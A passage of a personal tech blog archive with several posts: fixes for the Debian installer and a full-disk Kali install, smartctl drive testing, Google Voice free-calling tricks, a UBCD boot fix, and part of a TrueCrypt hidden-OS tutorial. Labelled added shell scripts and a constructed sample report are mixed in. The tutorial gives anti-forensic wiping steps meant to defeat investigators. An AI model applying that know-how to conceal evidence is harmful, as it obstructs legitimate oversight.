Here's the fix I came up with. I went back to the menu and chose Execute a Shell. Using the shell, I deleted /cdrom and created a new symlink to /cdrom from the appropriate directory of the installation media. (Fyi, in this particular chassis, I don't have a CD-ROM drive at all.)<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibcHxvd6wcbNSeLqfSTfKYR0n2VtzGfYb50A7fsHNIsT4VIbkE0syRgOD9wy3HVJVr9EYbeyK_Tpxk-cPi0-D6bYgO_mVHeIvfBzOWtvPOXBUnvm3i1sD-IsoUDNf6d7pH7rHOFgSKYkA/s1600/debian-installer_main-menu_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibcHxvd6wcbNSeLqfSTfKYR0n2VtzGfYb50A7fsHNIsT4VIbkE0syRgOD9wy3HVJVr9EYbeyK_Tpxk-cPi0-D6bYgO_mVHeIvfBzOWtvPOXBUnvm3i1sD-IsoUDNf6d7pH7rHOFgSKYkA/s400/debian-installer_main-menu_0.png" width="400" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjak9FQugNCqzsk4jhxS0zULRzNrE0AeaesBHYcyNnzbg3pnGHhk2CWm_OjRo9R2Tmc5D3nEgJ3Auhyphenhyphenxhu_feNdLEirIM51CPQckilB9NQedGrUsNPHKTESa0EHlnWQO7yKb2neyDZOvPo/s1600/debian-installer_shell-plugin_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjak9FQugNCqzsk4jhxS0zULRzNrE0AeaesBHYcyNnzbg3pnGHhk2CWm_OjRo9R2Tmc5D3nEgJ3Auhyphenhyphenxhu_feNdLEirIM51CPQckilB9NQedGrUsNPHKTESa0EHlnWQO7yKb2neyDZOvPo/s400/debian-installer_shell-plugin_1.png" width="400" /></a></div>
<br />
<br />
This tricked the installer into thinking the files on the USB thumb drive were located on an installer CD. The issue was immediately resolved and the installer was able to proceed past the point it was stuck at.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcuQnMBUKZbNQCAqrijWSF4jBnctHulgVACppF947Gdmpapw288XM01cAiE5GnQQdg3KC4j_eKywiwUuZDc6E4YeRbfz9b5jowwyDqmQclK8U492wA162sIvwc4xL6BDwNeeSioI3sDfc/s1600/debian-installer_main-menu_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcuQnMBUKZbNQCAqrijWSF4jBnctHulgVACppF947Gdmpapw288XM01cAiE5GnQQdg3KC4j_eKywiwUuZDc6E4YeRbfz9b5jowwyDqmQclK8U492wA162sIvwc4xL6BDwNeeSioI3sDfc/s400/debian-installer_main-menu_1.png" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhddNvT0jznjwbI7jJq2sjygjCXbyy4pYPd7IjmRMQ182eY1qi9YVYa2sY1LuafOv0K50E8j4cPxjdXz_UsPfKaiW9cb4IjdCT0WoHCjMg34Dyj2WQTFMNLmHaRvvekXpqh199Btc6vpAA/s1600/anna_choose_modules_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhddNvT0jznjwbI7jJq2sjygjCXbyy4pYPd7IjmRMQ182eY1qi9YVYa2sY1LuafOv0K50E8j4cPxjdXz_UsPfKaiW9cb4IjdCT0WoHCjMg34Dyj2WQTFMNLmHaRvvekXpqh199Btc6vpAA/s400/anna_choose_modules_0.png" width="400" /></a></div>
<br />
<br />
Hope this little hack helps someone out!<br />
<br />
Ciao!<br />
<br />
<br />
<br />
<br />
<br />
<div dir="ltr"><b>Kali Broken - "Cleaning up temporary files"</b> (2015-07-22)</div>
I broke my Kali Linux. I was going wild with Burp Suite while forgetting I was low on disk space. Once I noticed the disk was full, it was too late. The system was too crashy to even use and I had to do a hard boot. Of course, once I did a hard boot it wouldn't come back up. The booting process would get stuck at "Cleaning up temporary files" and then eventually die at a blank screen. :(<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj39h3gSu4DMcgtvIVLhXxhLuc_BI0Zu83BXq2xX1wpkbXxM4gIRZ2dxZvxwbXGxxNzjQzVyYTq490oJGxDT1TgL07rhX2RwBIWQ1cyHskTpyks02RMJyK6u9382T_mHkQK9nPMxIJJ7dM/s1600/kali2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj39h3gSu4DMcgtvIVLhXxhLuc_BI0Zu83BXq2xX1wpkbXxM4gIRZ2dxZvxwbXGxxNzjQzVyYTq490oJGxDT1TgL07rhX2RwBIWQ1cyHskTpyks02RMJyK6u9382T_mHkQK9nPMxIJJ7dM/s320/kali2.png" width="320" /></a></div>
<br />
<br />
I've documented the steps I used to fix it, minus a few wrong turns I took. :) Hope this helps someone:<br />
<br />
<br />
<ol>
<li><a href="https://www.kali.org/downloads/" target="_blank">Download Kali Linux</a> in order to boot it live for the repair</li>
<li>Create bootable media from the ISO (I like <a href="http://www.pendrivelinux.com/yumi-multiboot-usb-creator/" target="_blank">YUMI</a>)</li>
<li>Boot the live Kali to the GUI</li>
<li>Run the command <i>df </i>from Terminal and leave the results up for now</li>
<li>Open Thunar, right click the HDD with the broken Kali install and choose mount</li>
<li>Type the encryption password (this gave me an error which I just ignored)</li>
<li>Right click the LVM and start the multidisk</li>
<li>Wait a moment and then right click again and mount it. Unfortunately, this mounts it read only. No worries...</li>
<li>Run <i>df</i> again in order to determine what was mounted and where. Compare the 2 <i>df</i> outputs.</li>
<li>Now unmount it with: <i>sudo umount /media/the-place-it-is-mounted</i></li>
<li>Create a new directory for mounting: <i>sudo mkdir /media/hdd</i></li>
<li>Mount it read/write: <i>sudo mount -o rw /the/path /media/hdd</i> (Replace /the/path with the device node of the logical volume you identified by comparing the two <i>df</i> outputs.)</li>
<li>Use chroot so the mounted filesystem is treated roughly as if you had booted into it: <i>sudo chroot /media/hdd</i>. Everything you type from here on runs against the broken install, not the live system.</li>
<li>Delete whatever you can to free up space (<i>apt-get clean</i> empties the package cache in /var/cache/apt/archives, which is usually the biggest easy win)</li>
<li>Clean up the tmp files: <i>rm -r /tmp/*</i> (only inside the chroot; the same command run outside it empties the live system's /tmp instead, and the broken install stays full)</li>
<li>Exit chroot: <i>exit</i></li>
<li>Close Terminal</li>
<li>Go back to Thunar, unmount and stop the multidisk.</li>
<li>Reboot into the repaired Kali install!</li>
</ol>
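As an added example (mine, not part of the original post), here is a small POSIX shell helper that does the work of steps 13 to 15 against the install mounted at a path such as /media/hdd, without chrooting, and refuses to run against the live root so it can never empty the rescue system's own /tmp by mistake. The list of directories it empties (/tmp, /var/tmp, apt's package cache, root's Trash) is my assumption about what is safe to clear on a Debian-based install like Kali; adjust it for your layout.<br />

```shell
#!/bin/sh
# Added example: free space in a broken Debian/Kali install that is mounted
# read/write at $1 (e.g. /media/hdd) from a live system, without chrooting.
# Assumption: the directories listed in cleanup_root are safe to empty on a
# Debian-based install (the system recreates them or ignores their contents).

# Print the five largest top-level entries under ROOT (sizes in kilobytes), so
# you know where the space went before deleting anything.
space_hogs() {
    root=$1
    du -xsk "$root"/* 2>/dev/null | sort -rn | head -n 5
}

# Empty the directories that a Debian-based system recreates or ignores.
# Refuses "/" and "" so that it cannot clean the live system by mistake.
cleanup_root() {
    root=$1
    case "$root" in
        ""|/) echo "refusing to clean '$root' (live root)" >&2; return 1 ;;
    esac
    [ -d "$root" ] || { echo "$root is not a directory" >&2; return 1; }
    # Sanity check: an install root has /etc and /var; anything else is not
    # the broken install we mounted.
    [ -d "$root/etc" ] && [ -d "$root/var" ] || {
        echo "$root does not look like an install root" >&2; return 1; }
    for d in "$root/tmp" "$root/var/tmp" \
             "$root/var/cache/apt/archives" \
             "$root/root/.local/share/Trash"; do
        [ -d "$d" ] || continue
        # Delete the contents (dotfiles included) but keep the directory
        # itself: the boot process and apt expect /tmp and the cache to exist.
        find "$d" -mindepth 1 -maxdepth 1 -exec rm -rf -- {} +
    done
    return 0
}
```

Run <i>space_hogs /media/hdd</i> first and then <i>cleanup_root /media/hdd</i>; if that is still not enough, go after whatever space_hogs reported.<br />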
<br />
Remember, always keep good backups!!<br />
<br />
<i>EDIT: <a href="https://twitter.com/blackMOREOps" target="_blank">@blackMOREOps</a> just reminded me of something...Don't forget to clean the Trash folder! I did this and forgot to document. Thanks <a href="http://www.blackmoreops.com/" target="_blank">@blackMOREOps</a>!</i><br />
<br />
<br />
<br />
<i><b>Repaired OS:</b> Kali Linux 1.0.6, 32 bit</i><br />
<i><b>Live OS:</b> Kali Linux 1.1.0a, 32 bit</i><br />
<i><br /></i>
<i><br /></i>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-77913440104907099972015-06-30T01:02:00.000-05:002015-07-08T18:24:39.873-05:00A ProphesyI hereby prophesy that on July 8, 2015 Troy Hunt (@troyhunt) will tweet about a weird blog where a guy claims to have prophesied about the Hacking Team compromise. Troy's tweet will look something like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs9x2H4gAtEwzpN9LWupACc7aTEHnCSShc83HRUapxFQ_19FWSxQb2XO6U2lsr81PbMOz3ji94670dO7yiU8-c2NL05DmA_HpPfNrGvtJe0tGNrsnabU8CmwLEBQVsxrhhKNYLHiICHyE/s1600/proph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs9x2H4gAtEwzpN9LWupACc7aTEHnCSShc83HRUapxFQ_19FWSxQb2XO6U2lsr81PbMOz3ji94670dO7yiU8-c2NL05DmA_HpPfNrGvtJe0tGNrsnabU8CmwLEBQVsxrhhKNYLHiICHyE/s320/proph.png" width="320" /></a></div>
<br />
I will even predict the URL of his tweet:<br />
<br />
<a href="https://twitter.com/troyhunt/status/618909553892003840">https://twitter.com/troyhunt/status/618909553892003840</a><br />
<br />
You're welcome!Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-79508785054911204332014-09-01T03:52:00.001-05:002014-09-01T04:14:32.764-05:00Make a Phablet With Free Out/Inbound VoIP Calls<p dir="ltr">I think we need one last Google Voice hack before Google potentially messes it up by moving it to Hangouts, don't ya think? Okay, how about turning your tablet into a phablet using Google Voice and Talkatone and having free calls in and out? What's a phablet? A hybrid between a tablet and a phone, of course! I just made my Android tablet a phablet by doing these simple steps:</p>
<p dir="ltr">1. Install the Google Voice app on the tablet<br>
2. Install the Talkatone app on the tablet<br>
3. Go to a web browser and add the Talkatone phone number to the Google Voice account</p>
<p dir="ltr">So where does the hacking come in? It's like this: Talkatone only lets you receive calls for free, but not dial calls for free. Once your introductory free minutes are gone, you've gotta pay up in order to dial out. Unless you're me or you, that is! You see, we are going to call out by making the Google Voice app call IN to your Talkatone app. Wait, you mean one app will call the other app, all on the same device??? Yup!!!</p>
<p dir="ltr">When you need to dial out, just go to the Google Voice app and dial your friend's number but choose your Talkatone phone number in the dropdown menu. The next thing that will happen is that your Talkatone app will ring. Once you pick it up, it will start ringing your friend's number. Just like my previous Google Voice hack, we are basically dialing out by dialing in! Enjoy free unlimited outbound/inbound VoIP on your phantabulet!!!</p>
<div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPy4Te6Of_9YBtBwlVUbUQWs7gPiO6m07uqfwvt_JzZAlfCwFazMNnq9MTfhM6rwQZQRyW-Kl-3PGS1eJ7N85a1QgcJSzWrr_o0Vp5W4hmRdKILPjAlRt0LK01lpqXfPPEsnIvs42-JEE/s1600/Screenshot_2014-09-01-03-27-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"> <img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPy4Te6Of_9YBtBwlVUbUQWs7gPiO6m07uqfwvt_JzZAlfCwFazMNnq9MTfhM6rwQZQRyW-Kl-3PGS1eJ7N85a1QgcJSzWrr_o0Vp5W4hmRdKILPjAlRt0LK01lpqXfPPEsnIvs42-JEE/s640/Screenshot_2014-09-01-03-27-16.png"> </a> </div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-57480395012060332102014-08-07T01:38:00.000-05:002014-08-07T02:42:09.498-05:00Test HDD using smartctl and automate status<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlFd-Tyr91y02Qbgog8qE12vnMJUUWNOucA870qeLBbrefOR1d7WLHCN4jYEDb-ewKzNfYWhpbxjfqxLPNnAG5de6PWL6wEeRAb2pc7oUlv74UKrG5HwiTfGbeYyt8_oFpPGowu22nq5Y/s1600/smartctl3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlFd-Tyr91y02Qbgog8qE12vnMJUUWNOucA870qeLBbrefOR1d7WLHCN4jYEDb-ewKzNfYWhpbxjfqxLPNnAG5de6PWL6wEeRAb2pc7oUlv74UKrG5HwiTfGbeYyt8_oFpPGowu22nq5Y/s1600/smartctl3.png" width="400"></a></div>
<br>
<br>
I quite often test hard drives using various vendor specific live environments like SeaTools, etc. But what if you want to use a (live) Linux distro? This is quite doable with smartctl which is a part of smartmontools.<br>
<br>
Below are steps to do this, complete with a cool way to automate the status of the test appearing on the screen. Without automating the status, you will not receive any stdout notification unless you run a command manually. Remember, on some distros you will need to use sudo. Also, you will need to have smartmontools installed. If you don't know how to install it, there is plenty of info on Google on that. Keep in mind, some drives don't support SMART, which is lame.<br>
<br>
1. Start with looking at your disks to get the filename of the disk as it appears in /dev.<br>
<br>
<b>fdisk -l</b><br>
<br>
2. Once you've determined the disk you need to check, you can do a basic health status check. This is not authoritative but gives you a basic idea. Be sure to replace [sda] with your disk.<br>
<br>
<b>smartctl /dev/[sda] -H</b><br>
<br>
<br>
3. If you want to geek out on every last detail of the status/health of your disk which is currently available you can do that, too.<br>
<br>
<b>smartctl /dev/[sda] -a</b><br>
<br>
<br>
4. Okay, now it's time to start a test. You can run a short test or a long test, etc. but I always like to run a long test because it's more thorough.<br>
<br>
<b>smartctl /dev/[sda] --test=long</b><br>
<br>
<br>
5. Smartctl has one downside. It doesn't show you a status of the test running in the background unless you run smartctl -a and find the result within that information. To make things easier, I've provided a way to automate the status of the test so that it scrolls down the screen showing the percent complete. It will also display "...completed" when it is finished.<br>
<br>
<b>watch -n 1 "smartctl /dev/[sda] -a | grep 'execution\|remaining'"</b><br>
<br>
(The whole pipeline is in double quotes so that watch re-runs both smartctl and grep every second. Without the quotes, the pipe applies to watch's own screen output rather than to smartctl's, and you get nothing useful. The backslash followed by a pipe is grep's OR.)<br>
<br>
<br>
6. When the test is complete, you will still need to manually check the result of the test to see if there were errors.<br>
<br>
<b>smartctl /dev/[sda] -a</b><br>
<br>
7. Near the bottom of the output will be a section that begins with: "SMART Self-test log structure revision number..." Right below that, you will see the result of recent tests with the most recent (yours) listed first. The status will be shown, including the LBA of the first error, if there are any.<br>
<br>
8. Here are a couple of other useful commands...<br>
<br>
Help (useful in live Linux distros that do not contain man pages): <b>smartctl -h</b><br>
<br>
Abort a test that is currently running: <b>smartctl /dev/[sda] -X</b><br>
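As an added example that is not part of the original post, the following POSIX shell helpers pull the three things you actually care about out of <b>smartctl -a</b> output: the overall health verdict from step 2, the progress lines that the watch command in step 5 filters for, and the most recent self-test log entry from step 7. The report embedded in it is a constructed, abridged sample in smartctl's output format, not captured from a real drive, and the helper names are mine.<br>

```shell
#!/bin/sh
# Added example: parse `smartctl -a /dev/sdX` output. Each helper reads the
# report on stdin, so on a real system you run e.g.
#   smartctl -a /dev/sda | smart_last_result
# The report below is a constructed, abridged sample in smartctl's format,
# not output from a real drive.
SAMPLE_SMARTCTL_OUTPUT='smartctl 6.0 2012-10-10 r3643 [i686-linux-3.10.0] (local build)
=== START OF READ SMART DATA SECTION ===
SMART overall-health self-assessment test result: PASSED
Self-test execution status:      ( 249) Self-test routine in progress...
                                        90% of test remaining.
SMART Self-test log structure revision number 1
Num  Test_Description    Status                  Remaining  LifeTime(hours)  LBA_of_first_error
# 1  Extended offline    Completed: read failure       90%      1234         123456789
# 2  Short offline       Completed without error       00%      1200         -'

# Overall verdict (what -H shows): prints PASSED or FAILED!. This is only the
# drive firmware's own summary; a PASSED drive can still fail a long self-test,
# as the sample above illustrates.
smart_health() {
    sed -n 's/^SMART overall-health self-assessment test result: //p'
}

# The two lines that describe a running self-test (what `watch` should filter on).
smart_progress() {
    grep -e execution -e remaining
}

# Most recent self-test log entry ("# 1"): prints "<status>|<LBA_of_first_error>".
# Column layout: "# 1  <Description, 2 words>  <Status ...>  <Remaining>  <LifeTime>  <LBA>",
# so the status is fields 5 .. NF-3 and the LBA is the last field ("-" if none).
smart_last_result() {
    awk '$1 == "#" && $2 == "1" {
        status = $5
        for (i = 6; i <= NF - 3; i++) status = status " " $i
        print status "|" $NF
        exit
    }'
}

# Exit 0 only if the most recent logged self-test completed without error.
smart_last_ok() {
    [ "$(smart_last_result)" = "Completed without error|-" ]
}

# Step 5 done right: quote the whole pipeline so watch re-runs both smartctl
# and grep every second. Usage: smart_watch /dev/sda
smart_watch() {
    watch -n 1 "smartctl -a $1 | grep -e execution -e remaining"
}
```

With a real drive, <i>smartctl -a /dev/sda | smart_last_ok || echo "drive needs attention"</i> is the one-liner to drop into a script once the long test has finished.<br>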
<br>
<br>
Enjoy!<br>
<br>
If this helped you, consider leaving a comment and saying hello!<br>
<br>
<br>
<br>
<i>Tested on...</i><br>
<i>smartctl: 6.0 2012-10-10 r3643</i><br>
<i>OS: AVG 2013-08-01 from live USB drive</i><br>
<br>
<br>
<br>
<br>
<br>
<br>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-56930234978333217792014-07-22T13:43:00.002-05:002014-07-22T13:43:48.921-05:00Hack your DSL line to get phone service<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY9Ui1HyYTxUzYsIhcFcTrQhkQeRFLDjnI4K6mu-GnA2rFNm8o7gcle2-KvYPqIpfUE46NQKCJ_cgFpQDRyxmL6sFXbshittpZcCK8Wu_J3YrhzbW5LXwWMU6d7XpmQG4gE2zzxE5Wa6U/s1600/buttset.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY9Ui1HyYTxUzYsIhcFcTrQhkQeRFLDjnI4K6mu-GnA2rFNm8o7gcle2-KvYPqIpfUE46NQKCJ_cgFpQDRyxmL6sFXbshittpZcCK8Wu_J3YrhzbW5LXwWMU6d7XpmQG4gE2zzxE5Wa6U/s1600/buttset.jpg" /></a></div>
<br />
When my ISP installed my DSL only service (no phone), the technician tested the line for a dial tone with a buttset. This got me thinking. I asked the technician why there was a dial tone if it was a dry loop with DSL only. He said that there is indeed a dial tone but that you can only dial 911 or receive calls. He said you can't call out to anything besides 911. I said to myself, "Wanna bet?"<br />
<br />
I hacked it in under 5 minutes. Now I can call in and out, including free long distance. No, I didn't violate any laws or do anything highly technical. I just set up Google Voice! This saves me $20 a month. Now I'm not saying this will work with your DSL provider, but it did for mine so I thought I'd share.<br />
<br />
Here's what I did:<br />
<br />
1. Retrieved the phone number for my DSL service (this was provided to me when I signed up)<br />
2. Added the phone to my existing Google Voice account with Gear icon>Settings>Phones>Add another phone<br />
3. When Google Voice asked to verify my phone, I chose voice verification. My old POTS line phone rang and I typed in the 2 digit verification code.<br />
<br />
That's it!<br />
<br />
<b>How dialing in works:</b> If you dial my Google Voice number, it rings my home phone.<br />
<br />
<b>How dialing out works: </b>Well, it's admittedly a bit clunky but I browse to voice.google.com, click call, put in the number, choose the "Phone to call with" and wait for it to ring. Once I pick up the phone, it connects me to the number I dialed from my browser. I can also do this from my Android device using the Google Voice app.<br />
<br />
The beauty of this hack is that it dials out by dialing in. :)<br />
<br />
Why have a home phone in the cell phone age? Well, cell phones are awesome but they run out of battery, get lost or damaged, etc. My home phone is powered by the phone line and sits there reliably on a shelf for when it is needed. Nice to have options.<br />
<br />
Hope this helps someone save some money. Don't forget your DSL filter! If this helped you, leave me a quick comment.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-3627429161857795589.post-33469519074091327602014-04-28T01:22:00.000-05:002014-04-28T02:26:37.679-05:00Make UBCD's Parted Magic boot from a USB drive<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbC8Q0ZOgVFAHDnzbyqe83EVz64kgKnRtf2TXGvTlOKKTWmnotaZpgNKCBx1k-WF9LG5PLx5xzkEfvz0w500kNUVeRysWkBoINF3cQv67cvy838agN9LI9X9tjXRZedG6Xros8rJvbFsM/s1600/ubcd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbC8Q0ZOgVFAHDnzbyqe83EVz64kgKnRtf2TXGvTlOKKTWmnotaZpgNKCBx1k-WF9LG5PLx5xzkEfvz0w500kNUVeRysWkBoINF3cQv67cvy838agN9LI9X9tjXRZedG6Xros8rJvbFsM/s1600/ubcd.png" height="221" width="400" /></a></div>
<br />
<br />
I love <a href="http://www.ultimatebootcd.com/">UBCD</a>. It's a bootable CD with tools to do everything from securely shredding hard drives to modifying the Windows registry from Linux. I also love <a href="http://www.pendrivelinux.com/yumi-multiboot-usb-creator/">YUMI</a>. It allows you to create a bootable USB flash drive with multiple operating systems on it and even has support for adding or removing specific distros without killing your whole setup.<br />
<br />
One problem. If you use YUMI to create a bootable USB drive with UBCD on it, the bundled version of Parted Magic will not boot. Parted Magic is really awesome for rescuing systems, etc., so I was disappointed about this. I checked my md5sum and it was good, but when booting from my USB drive it would complain that it couldn't find the sqfs (the SquashFS image Parted Magic boots from). When I burned the very same ISO to a CD, Parted Magic worked fine, though!<br />
<br />
After not finding the information on Google and banging my head against a wall for a while, I was able to figure it out. Here's what I did:<br />
<br />
1. Download <a href="http://www.pendrivelinux.com/yumi-multiboot-usb-creator/">YUMI</a> and <a href="http://www.ultimatebootcd.com/download.html">UBCD</a> and use YUMI to add UBCD to the USB drive. If you need help with that part, there's lots of info on Google.<br />
<br />
2. Extract your downloaded UBCD ISO. There is lots of info on Google on how to extract an ISO, also.<br />
<br />
3. Once you've extracted your ISO, look for the pmagic folder and copy it to the root of your USB flash drive.<br />
<br />
That's it! Pretty easy but was a bit of a headache to figure out! Hope this post helps you! If so, please comment and say hello. I try to respond to as many comments as possible.<br />
<br />
By the way, if you use <a href="http://www.winehq.org/about/">WINE</a> to run YUMI from Linux as I did, beware that YUMI cannot format the drive even if you use sudo. The only way I was able to use it from Linux (Kali) was to use a USB drive that already had YUMI on it (which I installed from a Windows box a while ago). In other words, you can only <i>modify</i> your existing YUMI install from WINE, you can't do the initial YUMI install. If anybody finds a way around this, please comment below and let me know! Also, don't forget you'll have to use winecfg to <a href="http://askubuntu.com/questions/314205/how-to-mount-usb-flash-drive-to-wine">connect WINE to your USB drive</a>.<br />
<br />
Happy hacking!<br />
<br />
<br />
<b><i>Tested on:</i></b><br />
<i>Kali Linux 1.0</i><br />
<i>SanDisk 16GB USB flash drive</i><br />
<i>VirtualBox 4.3.10 r93012 (using <a href="http://www.metashock.de/2012/11/booting-your-usb-stick-using-virtual-box-on-a-linux-host/">raw disk hack</a> to boot to USB drive)</i><br />
<i>wine-1.4.1</i><br />
<i>YUMI-2.0.0.3</i><br />
<i>Ultimate Boot CD V5.2.9</i><br />
<i>PMAGIC_2013_08_01</i><br />
<i><br /></i>
<i><br /></i>
<i><br /></i>Unknownnoreply@blogger.com9tag:blogger.com,1999:blog-3627429161857795589.post-19277080816730485662013-09-07T20:37:00.001-05:002013-09-07T23:38:58.994-05:00Plausible deniability of a hidden OS - Part 3This is Part 3 of a 4 part post on using TrueCrypt to create a hidden operating system.<br />
<br />
Links to each section:<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part.html">Part 1</a> - (Un)boring intro with all the snazzy info<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-2.html">Part 2</a> - Set up your second partition<br />
Part 3 - Set up your first partition (sounds backwards, I know) -- you are here<br />
Part 4 - Other cool stuff -- COMING SOON<br />
<br />
<br />
<span style="font-size: large;">Part 3 - Set up your first partition</span><br />
<br />
<br />
~So now that you have copied your operating system from Partition 1 to the inner volume of Partition 2, we need to securely wipe the contents of Partition 1. Otherwise, even if you reinstall Windows on Partition 1, someone with forensic capabilities may be able to recover the previous Windows installation from Partition 1 and thereby build a case that you have a hidden operating system, etc.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqG8dHwfJXdnlRNOkeRTT2wS20260xRF3FQkLo8DeafQCF-pPiXjBqIbhbLeYySJJaADLl1iQMe1vlLziLiNlp9ZzU857-14gGnIT5ijiE-Y7qq5mQbjsRhchQ4TVfyfBW8mvdJT7RIsM/s1600/031.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqG8dHwfJXdnlRNOkeRTT2wS20260xRF3FQkLo8DeafQCF-pPiXjBqIbhbLeYySJJaADLl1iQMe1vlLziLiNlp9ZzU857-14gGnIT5ijiE-Y7qq5mQbjsRhchQ4TVfyfBW8mvdJT7RIsM/s400/031.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Using the default 3-pass (US DoD 5220.22-M) wipe mode is quite adequate in my opinion. For utter paranoia, try additional passes -- though that could put your wipe time at days or weeks! One caveat: overwriting only makes sense on a spinning disk. On an SSD, wear levelling means the sectors you overwrite are not necessarily the flash cells the old data lived in, so the previous installation can survive a wipe of any number of passes. </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK4PB1OrOWULrJx6Rvulj6KEb5dwOzgINVtImk70zjyuYMzFZad5ZRSJN3oNX9tNUKIwHoHj2eTv_4YeYCH126lOb4isYBoNiw2KqbnZ4XmNpSBIDIUTd6ykOD1sJQZ_YNvoPvyIfoiUs/s1600/032.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK4PB1OrOWULrJx6Rvulj6KEb5dwOzgINVtImk70zjyuYMzFZad5ZRSJN3oNX9tNUKIwHoHj2eTv_4YeYCH126lOb4isYBoNiw2KqbnZ4XmNpSBIDIUTd6ykOD1sJQZ_YNvoPvyIfoiUs/s400/032.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Click Wipe:</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYoR2hOA6shDEC09gOhhOG03xMC7l9qhbIgmB5OQ3f667UK68qURI5ftiRzm83lNKGr02-Zn2OZMa7PwpRCAMImziqV5FRcr2TMefcwZ3AlXTWsQV76Hq3yMmw-ruvqb2nVyn023AtqVg/s1600/033.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYoR2hOA6shDEC09gOhhOG03xMC7l9qhbIgmB5OQ3f667UK68qURI5ftiRzm83lNKGr02-Zn2OZMa7PwpRCAMImziqV5FRcr2TMefcwZ3AlXTWsQV76Hq3yMmw-ruvqb2nVyn023AtqVg/s400/033.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Click OK here: </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
